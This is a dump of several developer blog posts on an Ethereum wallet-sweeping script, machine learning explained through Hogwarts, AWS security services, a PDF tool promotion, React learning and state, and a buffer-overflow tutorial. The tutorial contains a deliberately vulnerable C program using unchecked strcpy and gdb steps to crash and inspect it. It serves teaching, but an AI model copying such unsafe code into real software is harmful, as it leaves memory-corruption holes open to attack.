id int64 5 1.93M | title stringlengths 0 128 | description stringlengths 0 25.5k | collection_id int64 0 28.1k | published_timestamp timestamp[s] | canonical_url stringlengths 14 581 | tag_list stringlengths 0 120 | body_markdown stringlengths 0 716k | user_username stringlengths 2 30 |
|---|---|---|---|---|---|---|---|---|
1,899,405 | Watch Each Block Get Created and Defeat Sweepers 🔥 | A Touch of Magic in the Dark Forest of the Blockchain Blockchain can often feel like... | 0 | 2024-06-24T23:45:35 | https://dev.to/wolfcito/watch-each-block-get-created-and-defeat-sweepers-4683 |

### A Touch of Magic in the Dark Forest of the Blockchain
Blockchain can often feel like traversing a dark forest fraught with challenges, especially when dealing with MEV. It's a realm where every transaction carries risks and rewards. In this article, we delve into strategies to safeguard your ETH from potential threats lurking within this mysterious landscape.
Recently, I encountered a critical security issue that resulted in significant losses from my prized rewards earned during a hackathon. This setback underscored the importance of vigilance and security measures in every project, emphasizing personal responsibility.
Sure, here's a revised version:
Would you like to read more about it? You can do so [here](https://x.com/AKAwolfcito/status/1800555585739673865).
Turning adversity into opportunity, I embarked on a journey to fortify my defenses against such vulnerabilities. This led me to coding a nice script designed to try to protect the remaining ETH in compromised wallets.
In this guide, we'll explore how this script operates and its pivotal role in safeguarding your ETH effectively.
### How This Module Saves Your Remaining ETH
To address the challenge of securing compromised wallets, I developed a script that monitors and transfers ETH to safety when conditions warrant.
#### Importing and Configuring Dependencies
```typescript
import { utils, Wallet, providers } from 'ethers'
import { gasPriceToGwei } from '../lib/converter.lib'
require('dotenv').config()
const { formatEther } = utils
const SAFE_WALLET = process.env.SAFE_WALLET as string
const RPC_URL = process.env.RPC_URL as string
const provider = new providers.JsonRpcProvider(RPC_URL)
const thresholdToTransfer = '0.01'
if (!SAFE_WALLET || !RPC_URL) {
throw new Error(
'SAFE_WALLET and RPC_URL must be set in the environment variables.'
)
}
console.log('Safe address: ', SAFE_WALLET)
```
- **Dependencies**: Imports necessary functions and classes from the `ethers` library to interact with the Ethereum blockchain.
- **Environment Variables**: Loads environment variables like `SAFE_WALLET` and `RPC_URL` for configuration.
#### Monitoring and Safe Transfer Function
```typescript
export const monitoringAndSafe = async (burnWallet: Wallet) => {
try {
const threshold = utils.parseEther(thresholdToTransfer)
const balance = await burnWallet.getBalance()
if (balance.isZero()) {
console.log('Balance is zero')
return
}
const gasPrice = await provider.getGasPrice()
const gasLimit = 21000
console.log(`Gas price: ${gasPriceToGwei(gasPrice)} gwei`)
const gasCost = gasPrice.mul(gasLimit).mul(12).div(10)
if (balance.lt(gasCost)) {
console.log(
`Insufficient funds for gas (balance=${formatEther(
balance
)} ETH, gasCost=${formatEther(gasCost)} ETH)`
)
return
}
if (balance.gt(threshold)) {
const safeValue = balance.sub(gasCost)
console.log(`safeValue: ${formatEther(safeValue)} ETH`)
try {
console.log(`Transferring ${formatEther(safeValue)} ETH to safe wallet`)
const nonce = await provider.getTransactionCount(
burnWallet.address,
'latest'
)
const tx = await burnWallet.sendTransaction({
to: SAFE_WALLET,
gasLimit,
gasPrice,
nonce,
value: safeValue,
})
console.log(
`Transaction sent with nonce ${tx.nonce}, transferring ${formatEther(
safeValue
)} ETH at gas price ${gasPriceToGwei(gasPrice)}`
)
console.log(
`Safe wallet balance: ${
SAFE_WALLET && formatEther(await provider.getBalance(SAFE_WALLET))
} ETH`
)
} catch (err: any) {
console.log(`Error sending transaction: ${err.message ?? err}`)
}
} else {
console.log(
`Balance is below threshold: ${utils.formatEther(balance)} ETH`
)
}
} catch (error) {
console.error('Error in monitoringAndSafe function:', error)
}
}
```
#### Detailed Explanation
- **Threshold Check**: Verifies if the wallet's balance meets a predefined threshold before initiating any transfer.
- **Gas Price Calculation**: Fetches the current gas price and calculates the gas cost required for transactions.
- **Transaction Execution**: Sends ETH from the compromised wallet to a designated safe wallet, ensuring sufficient balance for gas fees.
This script offers a proactive approach to protecting your ETH by automatically transferring funds to safety when conditions are met. It serves as a vital defense mechanism against potential threats in the blockchain ecosystem.
In conclusion, safeguarding your assets in the blockchain realm requires vigilance and proactive measures. By leveraging tools like this script, you can mitigate risks and ensure the security of your crypto assets.
---
We must remember that this is not an infallible script "even though Mighty Wolfcito has used it in his wallet before", but it could give you a good advantage against sweepers, and by using it, you are assuming the inherent risks associated with it.
By implementing this script, you can monitor and safeguard your ETH, mitigating risks associated with compromised wallets. Embrace the power of blockchain security and protect your assets with every transaction. | wolfcito | |
1,892,981 | The Magical World of Machine Learning at Hogwarts (Part #2) | ✨🔮 Welcome, young wizards and witches, to a wondrous journey through the enchanted world of machine... | 0 | 2024-06-24T23:45:16 | https://dev.to/gerryleonugroho/the-magical-world-of-machine-learning-at-hogwarts-part-2-5b37 | algorithms, machinelearning, ai, beginners | ✨🔮 Welcome, **young wizards and witches**, to a wondrous journey through the enchanted world of **machine learning at Hogwarts**! I, **Professor Leo**, a close friend of **Dumbledore**, invite you to explore the magical spells and charms that **bring the power of data to life**. My son, **Gemika Haziq Nugroho**, who is currently a young wizard enrolled here at **Hogwarts**, often marvels at how these mystical algorithms shape our daily wizarding adventures. In this second part of our series, we will delve into three extraordinary areas: the **Magic Mirror of Erised**, **Professor Trelawney's Predictions**, and the **Spell of Similitude**. ✨🧙♂️📜
First, gaze into the Magic Mirror of Erised, where **image recognition** spells reveal hidden truths within magical images. Next, peer into the mystical orb of Professor Trelawney as we unravel the secrets of **time series** prophecies, foreseeing events with uncanny accuracy. Finally, discover the **Spell of Similitude**, where similarity detection charms connect the dots between seemingly unrelated magical artifacts. Join us as we embark on this magical exploration, blending the wonders of Hogwarts with the marvels of **machine learning**! 🔍🪞🔮
## 4. **The Magic Mirror of Erised: Image Recognition Spells**

✨🪞 Step into the **enchanted chamber** where the Magic Mirror of Erised resides, a mirror that shows the deepest desires of one’s heart. Just as this mirror reveals hidden truths through its reflection, **image recognition spells** in **machine learning** decipher the secrets within images. Let’s explore the magic behind these powerful spells! 🪞✨
### 4.1 **Convolutional Neural Networks (CNNs)** 🧠✨
Imagine gazing into the Mirror of Erised, seeing not just your heart’s desires, but also the intricate details of your reflection. **Convolutional Neural Networks**, or **CNNs**, are like the mirror’s powerful enchantment. They scan images layer by layer, much like a wizard examining every detail of a magical artifact. **CNNs detect patterns such as edges, shapes, and colors**, combining these patterns to recognize objects and scenes.
For instance, when the Mirror of Erised shows **Harry Potter** & his family, a CNN spell would **detect the shapes of their faces**, the colors of their robes, and the expressions of love and happiness. In real-life applications, **CNNs can recognize faces**, **identify magical creatures**, or even **read the ancient runes** carved into the walls of Hogwarts. 🏰🔍
Imagine [Professor McGonagall](https://harrypotter.fandom.com/wiki/Minerva_McGonagall) using a CNN spell to **identify students in photographs** taken during Quidditch matches. The spell could recognize Harry flying on his Nimbus 2000, Hermione cheering from the stands, and even Hagrid’s towering figure on the sidelines. With CNNs, the **magic of image recognition** brings the world to life in vivid detail. 📸✨
### 4.2 **Image Segmentation** 🌌
Now, consider another spell, one that not only recognizes objects but also understands their boundaries. **Image segmentation** is like looking into the Mirror of Erised and seeing every object within it outlined in **shimmering light**. This spell divides an image into segments, each representing a different object or region.
Imagine using **image segmentation** to study the **magical creatures** in **the Forbidden Forest**. The spell could highlight the outlines of **unicorns**, **centaurs**, and **bowtruckles**, making it easier to study their behavior and habitats. Professor Hagrid might use this spell to keep track of his beloved creatures, ensuring their safety and well-being. 🦄🌲
In the magical realm of Hogwarts, **image recognition spells help** us see beyond the surface, revealing the hidden magic in every picture. Whether it’s **identifying enchanted objects**, **recognizing the faces** of our friends, or **studying the mysteries of magical creatures**, these spells bring clarity and understanding to the images we see. Just as the Mirror of Erised shows us our heart’s desires, **image recognition spells reveal** **the true essence** of the world around us. 🪞❤️✨
---
## 5. Professor Trelawney's Predictions: Time Series Prophecies

🔮✨ Welcome to Professor Trelawney’s Divination classroom, where crystal balls, tea leaves, and enchanted timepieces reveal glimpses of the future! Just as Professor Trelawney predicts events over time, **time series analysis in machine learning forecasts future trends** based on historical data. Let’s uncover the magic behind these prophetic spells! ✨🔮
### 5.1 **Autoregressive Integrated Moving Average (ARIMA)** 📜✨
Imagine Professor Trelawney peering into her crystal ball, **tracing the patterns of the past to foresee the future**. The ARIMA spell works similarly, using **past data to predict future trends**. It’s a combination of three powerful charms: **Autoregression (AR)**, which uses past values to predict future ones; **Integration (I)**, which makes the data stationary; and **Moving Average (MA)**, which smooths out the data by considering past errors.
In Hogwarts, **ARIMA** could be used to predict the number of students who will excel in their OWLs based on past performances. Imagine Professor McGonagall using this spell to prepare extra study sessions for those who need it, ensuring everyone is ready for their exams. With ARIMA, the future becomes a little less mysterious and a lot more manageable! 📚✨
### 5.2 **Long Short-Term Memory (LSTM)** 🧠✨
Now, envision a spell that remembers not just the immediate past but also the long-term patterns. **LSTM**, a type of **neural network**, is like having a [Pensieve](https://harrypotter.fandom.com/wiki/Pensieve) that stores and recalls important memories over time. This spell is particularly useful for **making predictions based on sequences of data**.
Imagine using LSTM to predict the weather for Quidditch matches. By analyzing historical weather data, the **spell can forecast if it will rain or shine on the day of the big game**. This helps Madame Hooch decide whether to enchant the pitch for rain or to prepare for clear skies. With LSTM, Hogwarts can always be prepared for whatever the future holds! ☀️🌧️
### 5.3 **Seasonal Decomposition of Time Series (STL)** 🍂✨
Lastly, consider a spell that breaks down the data into its seasonal components. STL is like Professor Trelawney’s method of seeing the **different layers of time—trends, seasonal patterns, and residuals**. This spell helps us understand the underlying patterns and **predict future values more accurately**.
Imagine using STL to **predict the number of visitors to Hogsmeade during different seasons**. The spell could **reveal that more visitors come during the winter holidays**, helping the shopkeepers prepare for the influx. Honeydukes might stock extra sweets, and Zonko’s might prepare more magical pranks, ensuring everyone enjoys their visit. 🍭❄️
In the magical world of Hogwarts, **time series prophecies help us plan for the future**, **making predictions based on the patterns of the past**. Whether it’s forecasting student achievements, predicting the weather, or preparing for seasonal events, these spells bring clarity and foresight to our magical lives. Just as Professor Trelawney gazes into the future, **time series analysis helps us navigate the mysteries of time** with confidence and wisdom. 🔮🕰️✨
---
## 6. The Spell of Similitude: Similarity Detection Charms

✨🔍 Welcome to the enchanting realm of similarity detection, where we cast the Spell of Similitude to find what’s alike in the magical world around us. Just as a wizard might use a charm to discover identical artifacts or twin spells, machine learning **similarity detection algorithms reveal the likeness between data points**. Let’s uncover the magic behind these charming spells! 🔍✨
### 6.1 **Cosine Similarity** 📐✨
Imagine casting a spell that measures the angle between two vectors to determine how similar they are. This is the essence of the Cosine Similarity charm. It **calculates the cosine of the angle between two data vectors**, indicating their similarity based on direction rather than magnitude.
In Hogwarts, think of Hermione using this charm to find similar spells in her vast collection of spellbooks. By comparing the descriptions of each spell, **Cosine Similarity** can highlight those with similar effects, helping her master related charms more efficiently. For example, if she’s studying the **Levitation Charm**, the spell might point her towards other charms involving levitation, like **_Wingardium Leviosa_** and Hover Charm. 📚🪄
In the magical world of digital archives, this charm could help the Hogwarts library find similar books or articles. If a student is reading about the history of magical creatures, **Cosine Similarity can recommend other texts with related content**, ensuring a comprehensive learning experience. 📜✨
### 6.2 **Jaccard Similarity** 📊✨
Now, picture a charm that compares the similarity and diversity of sample sets. The Jaccard Similarity charm measures the intersection over the union of two sets, revealing how much they overlap.
Imagine Professor Flitwick using this charm to compare the contents of different potion recipes. By analyzing the ingredients, **Jaccard Similarity** can identify which recipes share the most common elements. This helps in creating new potions by combining the best aspects of existing ones. For instance, if two potions for healing have many common ingredients, a new, more powerful healing potion could be devised. 🧪✨
In practical terms, this charm can be used to compare students’ class schedules. Suppose Harry and Ron want to see how many classes they have together. The **Jaccard Similarity** charm can quickly show the overlap in their timetables, ensuring they can plan their study sessions and adventures accordingly. 📅✨
### 6.3 **Euclidean Distance** 🌐✨
Lastly, consider a spell that **measures the straight-line distance between two points in a multi-dimensional** space. The Euclidean Distance charm calculates this distance, providing a measure of how similar or different the points are.
Imagine Professor Snape using this charm in his potion-making classes. By **measuring the 'distance' between the properties of different potion** ingredients, he can determine which ones are most similar or complementary. This helps in crafting potions with precise effects, ensuring the safety and effectiveness of each brew. 🧪🔮
In Hogwarts, Euclidean Distance might be used to compare the magical power levels of different wizards. By analyzing various attributes like spell proficiency, potion-making skills, and magical knowledge, this charm can reveal which wizards are most alike, fostering collaboration and mentorship. 🌟🧙♂️
In the magical world of Hogwarts, **similarity detection charms bring harmony and understanding**, helping us find what’s alike in our vast and wondrous world. Whether it’s **discovering similar spells, comparing potion recipes, or measuring magical power, these spells reveal the connections that bind us together**. With the Spell of Similitude, the magic of similarity shines bright, illuminating the path to greater knowledge and unity. 🔍✨🌟
---
As we conclude our second part of our magical journey, we've unveiled the fascinating realms of image recognition, time series predictions, and similarity detection. **The Magic Mirror of Erised** has shown us how spells can **interpret and analyze images**, bringing the hidden world to light. Professor Trelawney's prophecies have guided us through the **mysterious art of predicting future events**, allowing us to foresee and prepare for what lies ahead. And the **Spell of Similitude** has demonstrated how we can **find connections and similarities**, enriching our **understanding of the magical world**. 🪞🔮✨
Stay tuned, young wizards, for the [next enchanting](https://dev.to/gerryleonugroho/the-magical-world-of-machine-learning-at-hogwarts-part-3-km2) chapter in our series, where we will delve even deeper into the **magical algorithms** that shape our world. From detecting **anomalies to transforming data**, each spell brings us closer to **mastering the art of machine learning at Hogwarts**. Until then, may your wands stay steady and your magic grow ever stronger! 🧙♂️🌟🔮 | gerryleonugroho |
1,899,392 | Starting Your Cloud Security Journey in AWS: A Comprehensive Guide | Are you ready to dive into the world of cloud security? As an individual looking to enhance your... | 27,849 | 2024-06-24T23:36:25 | https://dev.to/agustin_villarreal/starting-your-cloud-security-journey-in-aws-a-comprehensive-guide-3615 | cybersecurity, cloud, aws, firstpost | Are you ready to dive into the world of cloud security? As an individual looking to enhance your skills in AWS security, you're in for an exciting journey. But before we explore specific services and architectures, let's start with the fundamentals.
This will be a long introduction, but necessary for the rest of the series
## What is Cloud Security?
Cloud security refers to the set of measures, controls, policies, and technologies that work together to protect cloud-based systems, data, and infrastructure. It's a shared responsibility between the cloud service provider (like AWS) and the customer, encompassing a wide range of strategies including:
- Data protection and encryption
- Access control and identity management
- Network security
- Application security
- Incident response and business continuity
- Compliance and governance
In the context of AWS, cloud security involves securing your data, applications, and infrastructure within the AWS ecosystem, while leveraging AWS's built-in security features and following best practices.
The entire series will be published in the future!
## The Shared Responsibility Model in Cloud Security
One of the most crucial concepts to understand when working with AWS (or any cloud provider) is the Shared Responsibility Model. This model delineates which security tasks are handled by AWS and which are the responsibility of the customer.
Here's a breakdown:
### AWS Responsibilities ("Security of the Cloud"):
- Physical security of data centers
- Hardware and software infrastructure
- Network infrastructure
- Virtualization infrastructure
Customer Responsibilities ("Security in the Cloud"):
- Data encryption and access management
- Platform, applications, identity and access management
- Operating system configuration
- Network and firewall configuration
- Client-side data encryption and data integrity authentication
- Server-side encryption (file system and/or data)

Understanding this model is crucial because it helps you focus your security efforts on the areas that are under your control, while trusting AWS to handle the underlying infrastructure security.
## The AWS Security Landscape
Now that we understand what cloud security is and how responsibilities are shared, let's explore the key AWS services that form the backbone of a robust cloud security strategy, a general perspective to implement them, and resources to further your learning.
## 1. AWS Identity and Access Management (IAM)
**What it is**: IAM is the identity service in AWS that helps you securely control access to AWS resources.
**How it works**: It enables you to manage users, security credentials such as access keys, and permissions that control which AWS resources users can access.
Implementation:
- Create IAM users, groups, and roles
- Implement the principle of least privilege
- Use IAM policies to assign permissions
- Enable multi-factor authentication (MFA) for added security
One key feature to implement is the use of Roles. Unlike IAM users, which are associated with a specific person, roles are intended to be assumable by anyone who needs them. Think of a role as a hat that an entity (user, application, or service) can put on to gain temporary permissions to do a specific job.
I'll explain the depth of roles in another series

## 2. AWS Key Management Service (KMS)
**What it is**: KMS is a managed service that makes it easy for you to create and control the encryption keys used to encrypt your data.
How it works: It uses Hardware Security Modules (HSMs) to protect the security of your keys and provides a centralized control point for your entire organization.
Implementation:
- Create and manage encryption keys
- Use KMS to encrypt data in other AWS services
- Set up key policies and grant permissions
- Enable key rotation for enhanced security

## 3. AWS Config
**What it is**: AWS Config provides a detailed view of the configuration of AWS resources in your account. This could work as an the inventory of our cloud resources and for to retrieve some metadata to create some CI/CD pipelines
**How it works**: It continuously monitors and records your AWS resource configurations, allowing you to assess, audit, and evaluate their configurations over time.
Implementation:
- Enable AWS Config from the AWS Management Console
- Define config rules to check for specific security configurations
- Set up notifications for non-compliant resources
We can create any type of rules:
- Unused EBS Volumes
- Security Groups unattached to any EC2 instances
- Databases ports open to the public
We talked non-compliant for the resources that cannot match any rules we predefined, or the AWS Managed Rules

## 4. AWS CloudTrail
**What it is**: CloudTrail is a service that enables governance, compliance, operational auditing, and risk auditing of your AWS account.
**How it works**: It logs, continuously monitors, and retains account activity related to actions across your AWS infrastructure.
Implementation:
- Create a trail in the CloudTrail console
- Configure the trail to log all management and data events
- Set up CloudWatch alarms for specific CloudTrail events
## 5. Amazon CloudWatch
**What it is**: CloudWatch is a monitoring and observability service for AWS resources and applications.
**How it works**: It collects monitoring and operational data in the form of logs, metrics, and events, providing a unified view of AWS resources, applications, and services.
Implementation:
- Set up CloudWatch dashboards for key metrics
- Configure alarms for abnormal activities
- Use CloudWatch Logs for centralized log management

## 6. Amazon GuardDuty
**What it is**: GuardDuty is a threat detection service that continuously monitors for malicious activity and unauthorized behavior.
**How it works**: It uses machine learning, anomaly detection, and integrated threat intelligence to identify unexpected and potentially unauthorized and malicious activity.
Implementation:
- Enable GuardDuty in the AWS Management Console
- Review and act on findings in the GuardDuty console
- Set up automated responses using AWS Lambda

## 7. Amazon Inspector
**What it is**: Inspector is an automated security assessment service that helps improve the security and compliance of applications deployed on AWS.
**How it works**: It automatically assesses applications for exposure, vulnerabilities, and deviations from best practices.
Implementation:
- Install the AWS agent on your EC2 instances
- Create assessment targets and templates
- Schedule and run assessments regularly

## 8. AWS Security Hub
**What it is**: Security Hub provides a comprehensive view of your security alerts and security posture across your AWS accounts.
**How it works**: It aggregates, organizes, and prioritizes your security alerts, or findings, from multiple AWS services and AWS Partner solutions.
Implementation:
- Enable Security Hub in the AWS Management Console
- Configure integrated services like GuardDuty and Inspector
- Set up custom actions for automated responses

## 9. AWS Systems Manager
**What it is**: Systems Manager provides a unified user interface to view operational data from multiple AWS services and automate tasks across your AWS resources.
**How it works**: It helps you maintain security and compliance by scanning your managed instances and reporting on (or taking corrective action on) any policy violations it detects.

Implementation:
- Install the Systems Manager agent on your EC2 instances
- Use Patch Manager for automated patching
- Implement Session Manager for secure shell access
## Conclusion
Embarking on your AWS cloud security journey is an exciting and rewarding endeavor. By understanding and mastering key services like Config, CloudTrail, GuardDuty, and others, you'll be well-equipped to secure your cloud infrastructure. Remember, cloud security is an ongoing process – stay curious, keep learning, and stay secure!
TL;DR
This was my first post! If you have any question or do you need to discuss anything, please feel free to ask or put anything below! | agustin_villarreal |
1,899,404 | ILovePDF3.com: Полезный Инструмент для Работы с Файлами | ILovePDF3.com — это новаторская платформа, предлагающая более 100 инструментов для работы с файлами.... | 0 | 2024-06-24T23:33:13 | https://dev.to/digitalbaker/ilovepdf3com-polieznyi-instrumient-dlia-raboty-s-failami-4e6e | слияниеpdf, конвертацияpdf, редактированиеpdf, сжатиеpdf | [ILovePDF3.com](https://ilovepdf3.com/) — это новаторская платформа, предлагающая более 100 инструментов для работы с файлами. Помимо стандартных PDF инструментов, таких как слияние, разделение и сжатие, ILovePDF3.com предоставляет расширенные функции для конвертации файлов и изображений.
Основные функции:
Конвертация: Преобразование PDF в Word, Excel, PowerPoint, JPG и наоборот.
Редактирование: Добавление водяных знаков, нумерации страниц, поворот и удаление страниц.
Безопасность: Защита паролем и разблокировка PDF.
Сайт имеет SSL-сертификацию, что обеспечивает безопасность и конфиденциальность данных пользователей. ILovePDF3.com — это надежный инструмент для решения широкого спектра задач, связанных с файлами и изображениями.
Посетите [ILovePDF3.com](https://ilovepdf3.com/) для получения более подробной информации.
| digitalbaker |
1,899,403 | React Learning Roadmap | Learning React with a Project-Based Approach: Week-by-Week Plan to Prepare for Jobs and... | 0 | 2024-06-24T23:29:48 | https://dev.to/dhirajaryaa/learn-react-with-a-project-based-approach-week-by-week-plan-to-prepare-for-jobs-and-freelancing-1gf5 | webdev, programming, react, reactjsdevelopment | ## Learning React with a Project-Based Approach: Week-by-Week Plan to Prepare for Jobs and Freelancing

### Introduction
Learning React can be a game-changer for aspiring web developers. React is a powerful library for building user interfaces and is widely used in the industry. This blog outlines a structured, week-by-week plan to learn React using a project-based approach. Additionally, we'll discuss how you can prepare yourself for job opportunities and freelancing.
### Week 1: Understanding the Basics of React
#### Objective: Familiarize Yourself with React's Fundamentals
**Day 1-2: Introduction to React**
- What is React?
- Why use React?
- Setting up the development environment.
**Day 3-4: JSX and Components**
- Understanding JSX.
- Creating functional components.
- Creating class components.
**Day 5-7: Props and State**
- Passing data using props.
- Managing state within components.
- Difference between props and state.
**Project Task:** Create a simple static website using React components, showcasing a personal portfolio.
**Job Prep Tip:** Start building a strong LinkedIn profile and GitHub repository to showcase your work.
### Week 2: Diving Deeper into React
#### Objective: Gain a Deeper Understanding of React's Core Concepts
**Day 1-2: Handling Events**
- Adding event listeners.
- Handling form inputs.
**Day 3-4: Conditional Rendering**
- Rendering elements based on conditions.
- Using `if`, `else`, and ternary operators.
**Day 5-7: Lists and Keys**
- Rendering lists in React.
- Understanding the importance of keys in lists.
**Project Task:** Enhance your portfolio website with dynamic content and interactivity, such as a contact form.
**Job Prep Tip:** Begin following industry leaders and React experts on social media platforms for insights and trends.
### Week 3: Working with Forms and Component Lifecycle
#### Objective: Master Forms and Understand the Component Lifecycle
**Day 1-2: Controlled Components**
- Creating controlled form components.
- Handling form submissions.
**Day 3-4: Component Lifecycle Methods**
- `componentDidMount`, `componentDidUpdate`, and `componentWillUnmount`.
- Using lifecycle methods effectively.
**Day 5-7: React Hooks Introduction**
- Understanding the purpose of hooks.
- Using `useState` and `useEffect`.
**Project Task:** Implement a simple to-do list application that allows adding, removing, and editing tasks.
**Job Prep Tip:** Start writing a technical blog or documenting your learning process. It showcases your knowledge and helps you retain concepts better.
### Week 4: Advanced React Concepts
#### Objective: Learn Advanced React Features and State Management
**Day 1-2: Context API**
- Understanding the Context API.
- Sharing data without prop drilling.
**Day 3-4: React Router**
- Setting up React Router.
- Navigating between different pages.
**Day 5-7: State Management with Redux**
- Introduction to Redux.
- Setting up Redux in a React application.
- Using actions, reducers, and the Redux store.
**Project Task:** Expand your to-do list application with multiple pages (e.g., a home page, about page) and global state management.
**Job Prep Tip:** Start applying for internships or entry-level jobs. Tailor your resume to highlight your React projects and skills.
### Week 5: Building and Deploying a Real-World Project
#### Objective: Apply What You've Learned to a Real-World Project
**Day 1-2: Project Planning**
- Choose a project idea (e.g., a blog application, e-commerce site).
- Plan the project structure and components.
**Day 3-5: Project Development**
- Start building your project.
- Implement core features and functionalities.
**Day 6-7: Testing and Deployment**
- Testing your application.
- Deploying your application using services like Netlify or Vercel.
**Project Task:** Complete and deploy your real-world project.
**Job Prep Tip:** Update your portfolio and LinkedIn profile with your latest project. Highlight the technologies and skills used.
### Week 6: Preparing for Job Interviews and Freelancing
#### Objective: Get Ready for Job Interviews and Freelancing Opportunities
**Day 1-2: Resume and Portfolio Review**
- Fine-tune your resume and portfolio.
- Ensure all projects are well-documented.
**Day 3-4: Interview Preparation**
- Practice common React interview questions.
- Participate in mock interviews.
**Day 5-7: Freelancing Platforms**
- Sign up on freelancing platforms like Upwork, Freelancer, or Fiverr.
- Create a compelling profile and start bidding on projects.
**Project Task:** Take on a small freelancing project to gain experience.
**Job Prep Tip:** Network with professionals in the field, attend webinars, and join online developer communities.
---
### Additional Tips for Success
- **Consistency is Key:** Dedicate a specific time each day for learning and practicing React.
- **Engage with the Community:** Join React communities on platforms like GitHub, Reddit, and Stack Overflow.
- **Stay Updated:** Follow the latest updates and trends in React development to stay ahead in the field.
---
By following this six-week plan, you'll not only learn React but also build impressive projects to showcase your skills. Additionally, you'll be well-prepared for job opportunities and freelancing. **Remember, consistency and practice are key**. Good luck on your journey to becoming a React developer! | dhirajaryaa |
1,899,402 | buffer Overflow (Application Vulnerability) | https://github.com/samglish/bufferOverflow/ In french dépassement de tampon ou débordement de... | 0 | 2024-06-24T23:28:31 | https://dev.to/samglish/buffer-overflow-application-vulnerability-20ic | bufferoverflo, vulnerabilities, vulnerability | **https://github.com/samglish/bufferOverflow/**
In french `dépassement de tampon ou débordement de tampon`
copy data without checking size.
A bug whereby a process, when writing to a buffer, writes outside the space allocated to the buffer, thus overwriting information necessary for the process.
**Most common exploitation**
1. stack overflow
2. Injection of a shellcode on the stack and calculation of its address
3. Overflow of a variable on the stack
4. Overwriting SEIP with the shellcode address

**A C program to demonstrate buffer overflow**
```c
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
int main(int argc, char *argv[])
{
// Reserve 5 byte of buffer plus the terminating NULL.
// should allocate 8 bytes = 2 double words,
// To overflow, need more than 8 bytes...
char buffer[5]; // If more than 8 characters input
// by user, there will be access
// violation, segmentation fault
// a prompt how to execute the program...
if (argc < 2)
{
printf("strcpy() NOT executed....\n");
printf("Syntax: %s <characters>\n", argv[0]);
exit(0);
}
// copy the user input to mybuffer, without any
// bound checking a secure version is strcpy_s()
strcpy(buffer, argv[1]);
printf("buffer content= %s\n", buffer);
// you may want to try strcpy_s()
printf("strcpy() executed...\n");
return 0;
}
```
## Test
Open terminal
1. compile the program
```terminal
gcc -g -o BOF testoverflow.c
```
2. execute
```terminal
./BOF sam
```
3. output
```
buffer content= sam
strcpy() executed...
```
### now enter more than 8 characters.
```
./BOF beididinasamuel
```
output
```
buffer content= beididinasamuel
strcpy() executed...
Erreur de segmentation
```
### exploit, use GDB in terminal
```
$gdb -q ./BOF
```
output
```
Reading symbols from ./BOF...
(gdb)
```
1. list the program
```
(gdb) list 1
```
output
```
1 // A C program to demonstrate buffer overflow
2 #include <stdio.h>
3 #include <string.h>
4 #include <stdlib.h>
5
6 int main(int argc, char *argv[])
7 {
8
9 // Reserve 5 byte of buffer plus the terminating NULL.
10 // should allocate 8 bytes = 2 double words,
(gdb)
11 // To overflow, need more than 8 bytes...
12 char buffer[5]; // If more than 8 characters input
13 // by user, there will be access
14 // violation, segmentation fault
15
16 // a prompt how to execute the program...
17 if (argc < 2)
18 {
19 printf("strcpy() NOT executed....\n");
20 printf("Syntax: %s <characters>\n", argv[0]);
(gdb)
21 exit(0);
22 }
23
24 // copy the user input to mybuffer, without any
25 // bound checking a secure version is strcpy_s()
26 strcpy(buffer, argv[1]);
27 printf("buffer content= %s\n", buffer);
28
29 // you may want to try strcpy_s()
30 printf("strcpy() executed...\n");
```
2. breakpoint ( gdb will stop your program just before that function is called)
```
(gdb) break 26
```
output
```
(gdb) break 26
Breakpoint 1 at 0x11ab: file overflow.c, line 26.
```
3. run the program
```
(gdb) run AAAAAAAAAAAAAAAA
```
output
```
Starting program: Directory/BOF AAAAAAAAAAAAAAAA
Breakpoint 1, main (argc=2, argv=0x7fffffffe038) at overflow.c:26
26 strcpy(buffer, argv[1]);
(gdb)
```
the program stopped at line 26
### let's analyze the data of the variable
```
(gdb) x/s buffer
```
output
```
0x7fffffffdf3b:"001"
(gdb)
```
for more information on the exploit of content visit click here
<a href="https://bufferoverflows.net/getting-started-with-linux-buffer-overflow/">https://bufferoverflows.net/getting-started-with-linux-buffer-overflow/</a> | samglish |
1,899,400 | Day 977 : Care Plan | liner notes: Saturday : Headed to the station early. Used the extra time to ship some packages. Did... | 0 | 2024-06-24T23:25:01 | https://dev.to/dwane/day-977-care-plan-1fgi | hiphop, code, coding, lifelongdev | _liner notes_:
- Saturday : Headed to the station early. Used the extra time to ship some packages. Did the radio show. Great times had. The recording of this week's show is at https://kNOwBETTERHIPHOP.com

- Sunday : Did the study sessions. I got the normal stuff done, but didn't really do a lot of coding on side projects. I did a bunch of research in running Machine Learning models and AI in the browser. Not a bad day.
- Professional : So... pretty productive day. I created a sample application for a new feature and started the blog post for it. Responded to some community questions. Had a couple of meetings. Good way to start off the week.
- Personal : I still have not finished this logo. haha No clue why I just don't finish it. Been looking at some properties again. Not a lot of land in the area I'm searching in.

Side note, the model I'm using to generate the alt text for the images is repeating itself and not writing complete sentences. Things have been pretty inconsistent recently. Guess we don't need those "what if AI replaces us" care plan right now. haha Going to eat dinner, go through some tracks for the radio show and work on this logo. My plan this week is to catch up on "Demon Slayer" also.
Have a great night!
peace piece
Dwane / conshus
https://dwane.io / https://HIPHOPandCODE.com
{% youtube DsW_qCAGQ9A %} | dwane |
1,898,167 | STATE MANAGEMENT IN REACT | STATE MANAGEMENT IN REACT WHAT DO YOU UNDERSTAND BY STATE MANAGEMENT? State is like a box that holds... | 0 | 2024-06-24T23:12:10 | https://dev.to/devmariam/state-management-in-react-488g | programming, react, state, webdev |
**STATE MANAGEMENT IN REACT**
WHAT DO YOU UNDERSTAND BY STATE MANAGEMENT?
State is like a box that holds data. For example, you have a box where various books are kept. In this scenerio, the book box holds information that your components needs. Basically, state help a component remember the various books stored in the box. When you want to update the books in the box, there are steps involved and that is basically creating a new book or make a copy of the existing one and then set the state to use the new copy of the state.
```
const [newTodo, setNewTodo] = useState(0);
```
The above code snippet means that newTodo holds the current state value and the setNewTodo is the function used to update the state variable data. useState(0)means that data start with a value 0.
State management is all about managing the data which influences the behaviour and rendering of your components. state can change over the lifecyle of a components, and each components of its own state and it could be updated within its component. UseState and setState are used to change a state of a components.
This brings use to explaning what a component is all about because we cant talk about state change without talking about components.
Let's dive right in......
**Components**
Components are the building blocks of the user interface (UI). They are reusable pieces of code that present parts of the UI. Components can be as simple as a button and as complex as an entire page. Each components can manage its own state and properties which we all know as props.
Props are a way of passing data from a parent to a child components. When a prop is passed down to a child component, it can not be modified but rather read the property and use it.
